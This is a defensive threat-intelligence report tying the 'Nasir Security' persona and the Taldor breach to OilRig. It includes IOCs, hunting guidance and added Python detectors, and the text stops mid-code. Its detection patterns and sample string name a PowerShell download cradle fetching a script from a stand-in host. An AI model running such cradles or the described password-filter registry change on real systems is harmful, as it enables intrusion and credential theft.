New Threat Actor: Nasir

This report provides an analysis of the threat actor operating under the name “Nasir Security,” establishing with high confidence that this entity is a new persona or hacktivist front for the well-documented Iranian state-sponsored group known as OilRig (also tracked as APT34, Helix Kitten, and Crambus). The analysis pivots from the group’s public claims surrounding the Taldor cyberattack to a deep technical examination of the incident’s Tactics, Techniques, and Procedures (TTPs), which align directly with OilRig’s established modus operandi. This report is intended to equip Security Operations Center (SOC) analysts, threat hunters, and incident responders with the actionable intelligence required to detect, mitigate, and respond to this evolving threat.

The key findings of this investigation are as follows:

  • The Taldor Cyberattack as a Supply Chain Compromise: The attack on Taldor Cyber & Security was a sophisticated supply chain compromise (MITRE ATT&CK T1195) initiated through the use of compromised valid accounts (T1078), rather than the exploitation of a software vulnerability. The strategic objective was to leverage Taldor’s position as a managed service provider (MSP) to gain access to its high-value clients within the Israeli defense and intelligence sectors, including the Ministry of Defense, Mossad, the Israel Defense Forces (IDF), Elbit Systems, and Rafael Advanced Defense Systems.
  • OilRig’s Evolving and Stealthy TTPs: OilRig (APT34) demonstrates a consistent evolution of its toolset and techniques, shifting towards stealthier methods that abuse legitimate enterprise services to evade detection. A recent campaign, detailed in this report, showcases a novel and highly effective exfiltration technique using Microsoft Exchange Web Services (EWS). This is coupled with a sophisticated credential harvesting method that abuses the Windows password filter DLL mechanism to capture plaintext passwords directly from the Local Security Authority (LSA) process, rendering common remediation actions like password resets ineffective.
  • “Nasir Security” as an Information Operation: The “Nasir Security” persona appears to be a strategic element of a broader information operation. The name, with its clear geopolitical resonance in the context of the ongoing Israel-Hezbollah conflict, serves to create confusion, misattribute state-sponsored cyber espionage activities as hacktivism, and potentially link them to unrelated kinetic events.
  • Distinction from Physical Sabotage Operations: The highly publicized Hezbollah pager and walkie-talkie explosions in September 2024 were a physical supply chain sabotage operation, involving the pre-positioning of explosives within devices during the manufacturing or distribution process. This event is fundamentally distinct in nature, methodology, and required defensive posture from the network-based cyber intrusions conducted by groups like OilRig.

Defensive efforts against this threat actor must prioritize identity and access management (IAM), behavioral detection methodologies over traditional signature-based controls, and rigorous monitoring of trusted third-party and MSP connections. A specific focus on detecting anomalous PowerShell usage, unauthorized access to the LSA process, and the abuse of mail-based protocols like EWS is critical for effective defense.

Threat Actor Profile: The Emergence of “Nasir Security”

Initial Emergence

The threat actor “Nasir Security” is a recently emerged group with a minimal public footprint. Initial open-source intelligence identified them as a “new ransomware group”. However, their primary and most significant known activity is not related to ransomware deployment but rather a data breach claim targeting a major Israeli technology firm. This discrepancy suggests that the initial classification may have been premature or that the group’s public persona is intentionally fluid.

The Taldor Breach Claim

The group’s sole claim to public notoriety is the cyberattack against Taldor Cyber & Security. In a public statement following the breach, the actor adopted a taunting and politically charged tone, directly admonishing Taldor for its perceived security failures. The statement’s primary purpose was to claim the exfiltration of highly sensitive data belonging to Taldor’s clients, explicitly naming the Israeli Ministry of Defense, Mossad, the IDF, Elbit Systems, and Rafael Advanced Defense Systems. This claim is the cornerstone for understanding the attack’s strategic objective. The targeting of Taldor was not for its own intrinsic value but as a deliberate supply chain attack—a gateway to compromise its roster of sensitive government and defense industry clientele.

“Nasir” as Strategic Misdirection and Information Operation

The selection of the name “Nasir” is highly unlikely to be arbitrary and points toward a calculated information operations tactic. The name holds significant geopolitical resonance, particularly through its phonetic and contextual association with Hassan Nasrallah, the now-deceased leader of Hezbollah. The “Nasir Security” claim against a prominent Israeli target surfaced during a period of intense kinetic conflict between Israel and Hezbollah, which notably included the pager sabotage operation. The success of this potential misdirection is evident in how the “Nasir threat actor” and the Hezbollah pager attacks have been linked in public discourse and queries.

State-sponsored actors, particularly those attributed to Iran (the suspected state sponsor of OilRig), frequently employ hacktivist personas and front groups. This strategy serves multiple purposes: it creates plausible deniability for state involvement, frames espionage operations as politically motivated activism, and advances geopolitical narratives in the information domain.

Therefore, it is a high-confidence assessment that the “Nasir Security” name was deliberately chosen to achieve two primary goals. First, it reframes a sophisticated, state-sponsored espionage operation as a less formal hacktivist attack. Second, it aims to sow confusion and conflate these cyber activities with the separate, physical sabotage operations targeting its regional ally, Hezbollah. This represents a sophisticated layer of information warfare applied on top of a traditional cyber espionage campaign.

Analytical Pivot

Due to the complete lack of unique, independently verifiable TTPs or Indicators of Compromise (IOCs) associated with “Nasir Security” as a standalone entity, and the strong alignment of the Taldor attack’s technical characteristics with a well-documented threat actor, this report will proceed with the assessment that “Nasir Security” is a persona currently in use by OilRig (APT34). The subsequent analysis will focus on the known operational capabilities, toolsets, and behaviors of OilRig to provide actionable intelligence for network defenders.

Case Study: Anatomy of the Taldor Supply Chain Compromise

Attack Overview

On or before September 30, 2024, Taldor Cyber & Security, a major Israeli IT services and managed security provider, was successfully compromised. The incident was not an opportunistic attack but a targeted intrusion focused on Taldor’s internal IT infrastructure and, critically, its privileged access to the managed service environments of its customers. This approach indicates a patient and well-resourced adversary aiming for high-value downstream targets.

Attack Chain Reconstruction

The operational flow of the Taldor compromise follows a classic pattern for sophisticated actors targeting MSPs, prioritizing stealth and the use of legitimate credentials over noisy exploits.

  • Initial Access: Compromised Valid Accounts (T1078): The initial intrusion vector was the use of compromised employee credentials. Multiple security analyses of the event stress that the attack did not exploit a software vulnerability (CVE) in any Taldor product or public-facing application. This strongly suggests that the initial compromise was achieved through methods such as a successful spearphishing campaign (T1566) or the acquisition of credentials from a prior breach or dark web marketplace.
  • Privilege Escalation: Domain Accounts (T1078.002): Upon gaining an initial foothold within the network, the attackers escalated their privileges from a standard employee account to “technician-level access” by compromising and utilizing domain accounts. This is a pivotal step in an MSP compromise, as technician-level accounts often possess administrative or near-administrative rights over the infrastructure of multiple downstream customers, making them a primary target for escalation.
  • Lateral Movement: Remote Services (T1021): With elevated privileges, the attackers leveraged remote services to move laterally within Taldor’s corporate network. While specific protocols were not publicly disclosed, this likely involved standard remote administration tools such as Remote Desktop Protocol (RDP) or other management solutions commonly used in an MSP environment to manage customer systems.
  • Objective: Supply Chain Compromise (T1195): The overarching strategic goal of the entire operation was to exploit the inherent trust relationship between Taldor and its clients. By compromising the MSP, the threat actor established a powerful and persistent foothold from which to pivot into the networks of Taldor’s customers. The actor’s own statements confirm the objective was to access and exfiltrate data related to the Israeli defense and intelligence establishment, making this a textbook supply chain attack.

An Identity-Based Failure, Not a Product Flaw

The consistent reporting on the absence of a CVE or a specific product vulnerability in the Taldor incident is a critical diagnostic indicator. It explicitly shifts the root cause of the breach away from software security and squarely into the domain of Identity and Access Management (IAM). The likely contributing factors to the success of the attack were failures in foundational identity security controls, such as insufficient multi-factor authentication (MFA) on employee accounts, inadequate monitoring and alerting on the usage of privileged accounts, and poor network segmentation between Taldor’s internal corporate environment and its customer-facing managed service infrastructure.

This type of compromise is far more dangerous and difficult for a SOC to detect than one based on a vulnerability. There is no software patch that can be applied to fix the issue. The malicious activity is conducted using legitimate user credentials and legitimate administrative tools (e.g., RDP, PowerShell). This reality means that defense against this class of TTP requires a fundamental shift in security posture—from a primary focus on vulnerability management to a more mature strategy centered on Identity Threat Detection and Response (ITDR). The Taldor incident powerfully underscores the modern security principle that “identity is the new perimeter.”

Attribution to OilRig (APT34)

While official public attribution remains unconfirmed, multiple security researchers have noted that the TTPs observed in the Taldor attack are highly consistent with the known operational playbook of OilRig (APT34). This includes the specific focus on credential-based initial access, the objective of supply chain compromise, and the persistent targeting of Israeli and Middle Eastern government and technology organizations. This strong circumstantial and TTP-based evidence forms the basis for the deep-dive analysis of OilRig in the subsequent section.

Table 1: MITRE ATT&CK Mapping for the Taldor Incident

| Tactic | Technique ID | Technique Name | Description of Use in Taldor Attack |
|---|---|---|---|
| Initial Access | T1566 | Phishing | Assessed as the likely method for obtaining the initial set of employee credentials, given the absence of a software vulnerability exploit. Spearphishing is a hallmark of OilRig’s initial access methodology. |
| Initial Access | T1078 | Valid Accounts | The core of the initial intrusion. The attackers used legitimate, albeit compromised, employee credentials to gain their first foothold inside Taldor’s network, bypassing perimeter defenses. |
| Privilege Escalation | T1078.002 | Valid Accounts: Domain Accounts | After initial entry, the attackers escalated privileges by compromising and using privileged domain accounts to gain “technician-level access” to the managed service environment. |
| Lateral Movement | T1021 | Remote Services | The attackers moved laterally through the network by leveraging remote services, a common technique for administrators and attackers alike to access other systems within a compromised environment. |
| Impact | T1195 | Supply Chain Compromise | This was the ultimate objective of the attack. By compromising Taldor, the attackers aimed to exploit the trusted MSP-client relationship to gain access to downstream targets in the Israeli defense sector. |

Attributed Actor Deep Dive: OilRig (APT34) Operational Doctrine

Overview and Geopolitical Context

OilRig, also tracked under various aliases including APT34, Helix Kitten, and Crambus, is a sophisticated cyber espionage group that has been operational since at least 2014. The group is widely assessed to have strong ties to the Iranian government, likely operating under the direction of the Iranian Ministry of Intelligence and Security (MOIS) or the Islamic Revolutionary Guard Corps (IRGC).

The primary mission of OilRig is intelligence collection in support of Iranian state interests. Their targeting is geographically focused on the Middle East but extends globally, with a sectoral emphasis on government, finance, energy, telecommunications, and chemical industries. The group is distinguished by its operational persistence, strong operational security, and a continuous cycle of malware development. They frequently introduce new, custom tools for major campaigns to evade signature-based detection, demonstrating a well-resourced and adaptive development capability.

Comprehensive TTP Analysis (Mapped to MITRE ATT&CK)

OilRig’s operational playbook is well-documented and showcases a reliance on stealthy techniques that blend in with legitimate network activity.

Initial Access (TA0001)

  • Spearphishing (T1566): This remains the group’s most reliable and frequently used entry vector. OilRig crafts meticulous spearphishing emails with weaponized attachments, typically Microsoft Office documents (Excel, RTF) that either exploit known vulnerabilities or contain malicious macros designed to execute a first-stage payload. The lures are often socially engineered and tailored to the target organization or individual, referencing job opportunities, industry-specific reports, or other plausible pretexts.
  • Exploitation of Public-Facing Application (T1190): While credential-based access is common, OilRig has a demonstrated history of exploiting vulnerabilities in public-facing applications when opportunities arise. A notable example from past campaigns was their use of CVE-2017-11882, a vulnerability in the Microsoft Office Equation Editor, to achieve remote code execution. More recent intelligence indicates their capability to leverage newer vulnerabilities, such as CVE-2024-30088 (a Windows Kernel flaw), for post-exploitation privilege escalation.

Execution (TA0002) and Persistence (TA0003)

  • Command and Scripting Interpreter: PowerShell (T1059.001): PowerShell is a cornerstone of OilRig’s tradecraft. It is used extensively across the attack lifecycle for execution of commands, delivery of next-stage payloads, and conducting in-memory operations that constitute fileless persistence. This heavy reliance on a legitimate and powerful system administration tool makes their activity difficult to distinguish from benign administrative tasks and evades traditional file-based antivirus solutions.
  • Scheduled Task/Job (T1053): To ensure their malware survives a system reboot, the group frequently establishes persistence by creating scheduled tasks. These tasks are configured to execute their malicious scripts (often VBScript or PowerShell) at regular intervals, upon user logon, or at system startup.
  • Registry Run Keys / Startup Folder (T1547.001): In campaigns involving more complex droppers, such as the MrPerfectInstaller tool, the group has been observed modifying registry keys to ensure their malicious components are loaded by core system processes like the Local Security Authority Subsystem Service (LSASS). This is a powerful persistence mechanism that embeds the malware deep within the operating system’s startup sequence.

Credential Access (TA0006)

  • OS Credential Dumping (T1003): OilRig routinely uses publicly available and well-known tools like Mimikatz and LaZagne to dump credentials from system memory. This allows them to harvest plaintext passwords and hashes for accounts logged into a compromised system, which are then used for lateral movement.
  • Novel Credential Harvesting via Password Filter DLL: Traditional credential dumping techniques like Mimikatz are effective but also generate significant noise that is often detected by modern Endpoint Detection and Response (EDR) solutions. To overcome this, OilRig developed a stealthier and more persistent method for credential harvesting. The Windows operating system provides a legitimate mechanism for enforcing password policies through custom DLLs, which can be registered to be loaded by the LSA process (lsass.exe). These “password filter” DLLs receive a user’s new password in plaintext every time it is changed, allowing the DLL to validate it against custom complexity rules. OilRig abuses this feature by creating a malicious password filter DLL, psgfilter.dll, and using a dropper to install it. The dropper modifies the registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\Notification Packages to add psgfilter to the list of packages loaded by LSA. This technique is exceptionally effective for several reasons: it leverages a legitimate OS feature, the malicious code is executed within the context of a highly privileged and trusted system process (LSA), and it guarantees access to fresh, plaintext credentials every time a user is forced to reset their password—directly defeating a common incident response and remediation step.

Command and Control (TA0011) and Exfiltration (TA0010)

  • Application Layer Protocol: DNS (T1071.004): A long-standing and characteristic technique for OilRig is the use of DNS tunneling for command and control (C2). They encode C2 communications and exfiltrated data into DNS queries and responses. Because DNS traffic is essential for network operations and is often less scrutinized by security appliances than HTTP/S traffic, this method provides a reliable and stealthy channel for communication with their infrastructure.
  • Evolution to Abusing Exchange Web Services (EWS): As network monitoring capabilities for DNS anomalies have improved, OilRig has adapted by developing a new C2 and exfiltration channel that blends seamlessly with normal business traffic. The premise is that no traffic is more common or trusted within an enterprise network than internal email. To leverage this, the group developed the .NET backdoor DevicesSrv.exe, which uses the legitimate Microsoft.Exchange.WebServices.dll library to communicate with the organization’s internal Microsoft Exchange server. Using credentials harvested by the psgfilter.dll or other means, the backdoor authenticates to the Exchange server via the EWS API. It then constructs a standard-looking email, attaches stolen files, and sends them to an external, attacker-controlled email address. The operation is so well-integrated that the sent email even appears in the compromised user’s “Sent Items” folder, further legitimizing the activity and making forensic analysis more difficult. This TTP is exceptionally difficult for a SOC to detect as it uses valid credentials, a legitimate and encrypted protocol (EWS over HTTPS), a trusted internal server (Exchange), and a common user action (sending an email with an attachment). It is designed to bypass many traditional Data Loss Prevention (DLP) and network security controls.

Malware and Toolset Arsenal

OilRig’s arsenal is a mix of custom-developed malware, publicly available hacking tools, and legitimate system administration utilities used for malicious purposes (“living off the land”).

Table 2: OilRig (APT34) Malware and Toolset Summary

| Tool/Malware Name | Type | Functionality | Associated Campaigns/Years & Source Snippets |
|---|---|---|---|
| MrPerfectInstaller | Dropper | .NET dropper responsible for installing the psgfilter.dll and DevicesSrv.exe backdoor. Stores components in Base64 buffers. | 2022-2023 Middle East Campaign |
| psgfilter.dll | Credential Harvester | A malicious password filter DLL loaded by LSASS to capture plaintext passwords every time a user changes their password. | 2022-2023 Middle East Campaign |
| DevicesSrv.exe | Backdoor | .NET backdoor that uses harvested credentials to authenticate to an internal Exchange server via EWS and exfiltrate data as email attachments. | 2022-2023 Middle East Campaign |
| PowerExchange | Backdoor | PowerShell-based backdoor that uses a compromised Exchange Server as a C2 channel, monitoring for emails from attackers and executing embedded commands. | 2023 Middle East Government Campaign |
| Clipog | Info-stealer | An information-stealing malware capable of capturing clipboard data and logging keystrokes. | 2023 Middle East Government Campaign |
| Helminth | Backdoor/RAT | A long-standing backdoor in OilRig’s arsenal, typically delivered via weaponized Office documents. Provides remote access and command execution. | 2016-Present |
| OopsIE | Trojan | A Trojan used in attacks against financial and insurance sectors in the Middle East. | 2018 |
| RGDoor | Backdoor | An IIS backdoor deployed on web servers to provide persistent remote access. | 2018 |
| BONDUPDATER | Downloader | A downloader component that often works in conjunction with other backdoors. Has been observed using a domain generation algorithm (DGA). | 2017-Present |
| SideTwist | Backdoor | A backdoor variant used in a 2021 campaign targeting organizations in Lebanon. | 2021 |
| Saitama | Backdoor | A backdoor delivered via spear-phishing in a 2022 campaign against Jordan’s foreign ministry. | 2022 |
| Mimikatz | Credential Dumper | Publicly available tool used to dump credentials from memory. A staple for many APT groups. | Ongoing |
| Plink | Tunneling Tool | Publicly available command-line connection tool used to create tunnels for lateral movement (e.g., for RDP), blending in with legitimate traffic. | 2023 |
| LaZagne | Credential Dumper | Publicly available tool used to harvest stored passwords from a variety of applications and web browsers on a compromised system. | Ongoing |

Actionable Intelligence for Security Operations

This section provides consolidated, actionable intelligence derived from the analysis of OilRig’s TTPs and toolsets. It is designed for direct use by SOC teams for detection, hunting, and incident response.

Consolidated Indicators of Compromise (IOCs)

The following table contains a consolidated list of known IOCs associated with various OilRig campaigns. These indicators should be ingested into security tools such as SIEMs, EDR platforms, firewalls, and threat intelligence platforms to generate alerts on known malicious activity.

Table 3: Consolidated Indicators of Compromise (IOCs) for OilRig (APT34)

| IOC Type | Value | Description/Context | Source Snippets |
|---|---|---|---|
| File Hash (SHA256) | 6bad09944b3340947d2b39640b0e04c7b697a9ce70c7e47bc2276ed825e74a2a | Malware sample from 2023 Middle East government campaign. | all available on request |
| File Hash (SHA256) | ba620b91bef388239f3078ecdcc9398318fd8465288f74b4110b2a463499ba08 | Malware sample from 2023 Middle East government campaign. | |
| File Hash (SHA256) | d0bfdb5f0de097e4460c13bc333755958fb30d4cb22e5f4475731ad1bdd579ec | Malware sample from 2023 Middle East government campaign. | |
| File Hash (SHA256) | c488127b3384322f636b2a213f6f7b5fdaa6545a27d550995dbf3f32e22424bf | Malware sample from 2023 Middle East government campaign. | |
| IPv4 Address | 78.47.218[.]106 | C2 infrastructure from 2023 Middle East government campaign. | |
| IPv4 Address | 192.121.22[.]46 | C2 infrastructure from 2023 Middle East government campaign. | |
| IPv4 Address | 151.236.19[.]91 | C2 infrastructure from 2023 Middle East government campaign. | |
| IPv4 Address | 91.132.92[.]90 | C2 infrastructure from 2023 Middle East government campaign. | |
| C2 Domain | main-google-resolver[.]com | C2 domain used for HTTP-based C2 in 2016 campaign. | |
| File Path | %System%\psgfilter.dll | Malicious password filter DLL dropped by MrPerfectInstaller. | |
| File Path | %ProgramData%\WindowsSoftwareDevices\DevicesSrv.exe | EWS exfiltration backdoor dropped by MrPerfectInstaller. | |
| File Path | %ProgramData%\WindowsSoftwareDevices\Microsoft.Exchange.WebServices.dll | Legitimate EWS library dropped alongside backdoor. | |
| File Path | %Public%\Libraries\LicenseCheck.vbs | VBScript used for persistence via scheduled task in 2016 campaign. | |
| Registry Key | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\Notification Packages | Modified to include scecli, psgfilter to load the malicious password filter. | |
| Scheduled Task | MSOfficeLicenseCheck | Scheduled task name used for persistence in 2016 campaign. | |

Detection Engineering and Threat Hunting Guidance

As OilRig continuously develops new malware with unique file hashes, a resilient detection strategy must focus on their consistent behaviors (TTPs) rather than ephemeral indicators. The following guidance provides hypotheses and logic for hunting OilRig activity.

Hunting for Password Filter Abuse (T1547.001 / T1003)

  • Hypothesis: The threat actor will register a new, unauthorized password filter DLL to persistently harvest credentials from the LSA.
  • Detection Logic: The registration of a password filter DLL requires a modification to a specific registry value. The default value in modern Windows versions is typically just scecli. Any additions to this value are extremely rare in normal enterprise environments and should be considered highly suspicious. Monitor for any write operations to the registry value HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages. An alert should be triggered if any process modifies this value to include a new DLL name (e.g., psgfilter). This is a high-fidelity detection for this specific persistence and credential access technique.
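The detection logic above, prototyped over Sysmon Event ID 13 (registry value set) records, as an added example that is not part of the original report. One caveat worth building in: CurrentControlSet is a symbolic link to one of the ControlSet00N keys, so telemetry may record either spelling (the report itself cites ControlSet001 in one place and CurrentControlSet in another), and a rule that matches only one will miss the other. The field names are Sysmon's; the sample events, hostnames and the way the REG_MULTI_SZ value is split are constructed assumptions.

```python
import re
from typing import Dict, Iterable, List

# Registry value whose modification registers an LSA password filter DLL.
# CurrentControlSet is a symbolic link to one of the ControlSet00N keys, so a
# rule that matches only one spelling misses the other; both are matched here.
NOTIFICATION_PACKAGES_RE = re.compile(
    r"\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})\\Control\\Lsa\\Notification Packages$",
    re.IGNORECASE,
)

# Baseline from the report: modern Windows ships with just "scecli" here.
# Add any password filter your organisation deployed deliberately.
DEFAULT_BASELINE = frozenset({"scecli"})


def parse_packages(details: str) -> List[str]:
    """Split the REG_MULTI_SZ value as it appears in the Sysmon Details field.
    Assumption: entries are separated by NUL, newline or other whitespace."""
    return [p.lower() for p in re.split(r"[\s\x00]+", details) if p]


def hunt_password_filter_writes(events: Iterable[Dict], baseline=DEFAULT_BASELINE) -> List[Dict]:
    """Return one finding per Event ID 13 that writes a package name outside the
    baseline into Notification Packages, whichever process performed the write."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        if not NOTIFICATION_PACKAGES_RE.search(ev.get("TargetObject", "")):
            continue
        unexpected = sorted(set(parse_packages(ev.get("Details", ""))) - set(baseline))
        if unexpected:
            findings.append({
                "host": ev.get("Computer"),
                "image": ev.get("Image"),
                "target": ev["TargetObject"],
                "unexpected_packages": unexpected,
            })
    return findings


# Constructed Sysmon-style records (not real telemetry). The first mirrors the
# registry change the report attributes to the MrPerfectInstaller dropper.
SAMPLE_EVENTS = [
    {"EventID": 13, "Computer": "ws01", "Image": r"C:\Users\Public\installer.exe",
     "TargetObject": r"HKLM\SYSTEM\ControlSet001\Control\Lsa\Notification Packages",
     "Details": "scecli\x00psgfilter"},
    {"EventID": 13, "Computer": "dc01", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages",
     "Details": "scecli"},
    {"EventID": 13, "Computer": "ws02", "Image": r"C:\Windows\System32\lsass.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages",
     "Details": "kerberos\x00msv1_0"},
    {"EventID": 1, "Computer": "ws01", "Image": r"C:\Users\Public\installer.exe"},
]

if __name__ == "__main__":
    for finding in hunt_password_filter_writes(SAMPLE_EVENTS):
        print(finding)
```

The same comparison against a baseline set is what makes the rule survive a renamed DLL: the alert keys on "anything other than what we expect", not on the string psgfilter, so a future variant under a different name still fires.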

Hunting for EWS Abuse (T1071.003 / T1567.002)

  • Hypothesis: The threat actor will use a compromised user account or a service account to exfiltrate data via EWS to external email domains.
  • Detection Logic: This requires analyzing Exchange server logs and/or network traffic. Create a baseline of normal EWS activity. Hunt for deviations, such as:
    • EWS sessions originating from unusual processes or executables (i.e., not OUTLOOK.EXE or a known server process). Correlate network logs with endpoint process execution logs to identify binaries like DevicesSrv.exe making EWS API calls.
    • A sudden and significant increase in the volume of emails with large attachments being sent from a specific user account, especially to a new or previously unknown external recipient domain.
    • EWS authentication events that do not correlate with interactive user logons or known application service times.
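The first two hunts above (and the EWS row of Table 4 below, which joins Sysmon network and process events) prototyped in Python, as an added example that is not part of the original report: one function joins Sysmon Event ID 1 and Event ID 3 on ProcessGuid to surface HTTPS connections to the Exchange host from a binary that is not an expected EWS client, and the other compares each sender's attachment volume per external recipient domain against that sender's own baseline window. The Sysmon field names are real; the Exchange hostname, internal domain, allow-list of EWS clients, thresholds, and the message-tracking records are constructed assumptions.

```python
import ntpath
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Tuple

# Constructed environment values (assumptions; tune per estate).
EXCHANGE_HOSTS = {"mail.corp.example"}
INTERNAL_DOMAIN = "corp.example"
EXPECTED_EWS_CLIENTS = {"outlook.exe"}  # processes expected to speak EWS from endpoints


def hunt_ews_from_unexpected_process(process_events: Iterable[Dict],
                                     network_events: Iterable[Dict]) -> List[Dict]:
    """Join Sysmon Event ID 1 (process create) to Event ID 3 (network connect) on
    ProcessGuid and report HTTPS connections to an Exchange host from any binary
    that is not an expected EWS client."""
    image_by_guid = {e["ProcessGuid"]: e["Image"]
                     for e in process_events if e.get("EventID") == 1}
    hits = []
    for n in network_events:
        if n.get("EventID") != 3 or n.get("DestinationPort") != 443:
            continue
        if n.get("DestinationHostname", "").lower() not in EXCHANGE_HOSTS:
            continue
        image = image_by_guid.get(n["ProcessGuid"], "<unknown>")
        # ntpath handles Windows separators regardless of the analyst's own OS.
        if ntpath.basename(image).lower() not in EXPECTED_EWS_CLIENTS:
            hits.append({"host": n["Computer"], "image": image, "dst": n["DestinationHostname"]})
    return hits


def hunt_attachment_exfil(messages: Iterable[Dict], baseline_end: datetime,
                          ratio: float = 5.0, min_bytes: int = 10_000_000) -> List[Tuple]:
    """Per (sender, external recipient domain): compare attachment bytes in the hunt
    window (on/after baseline_end) with the sender's baseline. Flags a domain the
    sender never mailed before, or a volume at least `ratio` times the baseline."""
    seen_before = set()
    base_bytes, hunt_bytes = defaultdict(int), defaultdict(int)
    for m in messages:
        domain = m["recipient"].rsplit("@", 1)[1].lower()
        if domain == INTERNAL_DOMAIN:
            continue  # internal mail is out of scope for this hunt
        key = (m["sender"], domain)
        if m["ts"] < baseline_end:
            seen_before.add(key)
            base_bytes[key] += m["attachment_bytes"]
        else:
            hunt_bytes[key] += m["attachment_bytes"]
    findings = []
    for key, size in hunt_bytes.items():
        if key not in seen_before and size > 0:
            findings.append((key[0], key[1], size, "new external recipient domain"))
        elif size >= min_bytes and size >= ratio * base_bytes[key]:
            findings.append((key[0], key[1], size, "attachment volume spike"))
    return findings


# Constructed sample telemetry (not real data). guid-2 models the DevicesSrv.exe
# path the report lists; the recipient domain relay.invalid stands in for an
# attacker-controlled mailbox.
BASELINE_END = datetime(2024, 9, 1)
SAMPLE_PROCESS_EVENTS = [
    {"EventID": 1, "Computer": "ws01", "ProcessGuid": "{guid-1}",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"EventID": 1, "Computer": "ws01", "ProcessGuid": "{guid-2}",
     "Image": r"C:\ProgramData\WindowsSoftwareDevices\DevicesSrv.exe"},
]
SAMPLE_NETWORK_EVENTS = [
    {"EventID": 3, "Computer": "ws01", "ProcessGuid": "{guid-1}",
     "DestinationHostname": "mail.corp.example", "DestinationPort": 443},
    {"EventID": 3, "Computer": "ws01", "ProcessGuid": "{guid-2}",
     "DestinationHostname": "mail.corp.example", "DestinationPort": 443},
    {"EventID": 3, "Computer": "ws01", "ProcessGuid": "{guid-2}",
     "DestinationHostname": "update.corp.example", "DestinationPort": 443},
]
SAMPLE_MESSAGES = [
    {"ts": datetime(2024, 8, 5), "sender": "j.doe@corp.example",
     "recipient": "pm@partner.example", "attachment_bytes": 2_000_000},
    {"ts": datetime(2024, 8, 20), "sender": "j.doe@corp.example",
     "recipient": "pm@partner.example", "attachment_bytes": 3_000_000},
    {"ts": datetime(2024, 9, 3), "sender": "j.doe@corp.example",
     "recipient": "pm@partner.example", "attachment_bytes": 1_500_000},
    {"ts": datetime(2024, 9, 3), "sender": "j.doe@corp.example",
     "recipient": "it@corp.example", "attachment_bytes": 50_000_000},
    {"ts": datetime(2024, 9, 4), "sender": "j.doe@corp.example",
     "recipient": "drop@relay.invalid", "attachment_bytes": 40_000_000},
]

if __name__ == "__main__":
    print(hunt_ews_from_unexpected_process(SAMPLE_PROCESS_EVENTS, SAMPLE_NETWORK_EVENTS))
    print(hunt_attachment_exfil(SAMPLE_MESSAGES, BASELINE_END))
```

Baselining per sender rather than globally matters here: a 40 MB attachment is routine for some roles and anomalous for others, and the backdoor sends from whichever account it harvested, so the comparison has to be against that account's own history.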

Hunting for PowerShell-based Execution and Persistence (T1059.001 / T1053)

  • Hypothesis: The actor will use obfuscated PowerShell commands to execute payloads in memory and will use the native schtasks.exe utility to create persistence.
  • Detection Logic: Monitor process creation events and command-line arguments.
    • Look for powershell.exe processes launched with command-line arguments indicating obfuscation or encoding, such as -enc, -e, -encodedcommand, or IEX (New-Object Net.WebClient).DownloadString.
    • Hunt for executions of schtasks.exe /create where the command being scheduled (/tr) points to a .ps1 or .vbs script, particularly if that script resides in an unusual directory like %Public%, %ProgramData%, or a user’s temporary folder.
    • Correlate PowerShell execution with preceding activity from certutil.exe, especially the use of the -decode argument, which OilRig has used to deobfuscate and drop multi-stage payloads on disk before execution.
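The three command-line hunts above as one triage routine, an added example that is not part of the original report. It recognises the abbreviated spellings powershell.exe accepts for -EncodedCommand (-e, -ec, -enc and so on), decodes the Base64/UTF-16LE payload so the analyst sees the actual script, re-checks the decoded script for the download cradle quoted above, and separately flags schtasks /create actions whose /tr target is a .ps1 or .vbs in a public or temporary directory, and certutil -decode. The command lines, the example.invalid URL and the rule names are constructed; the LicenseCheck.vbs path and task name come from the IOC table in this report.

```python
import base64
import re
from typing import List, Tuple

# powershell.exe accepts abbreviated parameter names, so -e, -ec, -enc and
# -encodedcommand all introduce a Base64 payload; the character class keeps
# -ExecutionPolicy (and -ep) from matching.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)[-/]e[ncodema]*\s+([A-Za-z0-9+/=]{16,})")
IEX_RE = re.compile(r"(?i)\biex\b|invoke-expression")
SCHTASKS_RE = re.compile(r'(?i)\bschtasks(?:\.exe)?\b.*?/create\b.*?/tr\s+("[^"]+"|\S+)')
SCRIPT_RE = re.compile(r"(?i)\.(?:ps1|vbs)\b")
SUSPICIOUS_DIR_RE = re.compile(
    r"(?i)%(?:public|programdata|temp|tmp)%|\\users\\public\\|\\programdata\\|\\temp\\")
CERTUTIL_RE = re.compile(r"(?i)\bcertutil(?:\.exe)?\b.*\s-decode\b")


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as Base64 over UTF-16LE."""
    return base64.b64decode(b64, validate=True).decode("utf-16le", errors="replace")


def is_download_cradle(script: str) -> bool:
    return "downloadstring" in script.lower() and bool(IEX_RE.search(script))


def triage(cmdline: str) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs for one process-creation command line."""
    hits = []
    m = ENCODED_RE.search(cmdline)
    if m:
        try:
            script = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            script = "<undecodable>"
        hits.append(("encoded_command", script))
        if is_download_cradle(script):  # inspect what was hidden, not just that it was hidden
            hits.append(("download_cradle", script))
    elif is_download_cradle(cmdline):
        hits.append(("download_cradle", cmdline))
    m = SCHTASKS_RE.search(cmdline)
    if m:
        task_action = m.group(1).strip('"')
        if SCRIPT_RE.search(task_action):
            where = "suspicious directory" if SUSPICIOUS_DIR_RE.search(task_action) else "script"
            hits.append(("scheduled_script", f"{where}: {task_action}"))
    if CERTUTIL_RE.search(cmdline):
        hits.append(("certutil_decode", cmdline))
    return hits


# Constructed samples (not captured telemetry). The encoded payload is built
# here so the round trip through decode_encoded_command can be checked.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
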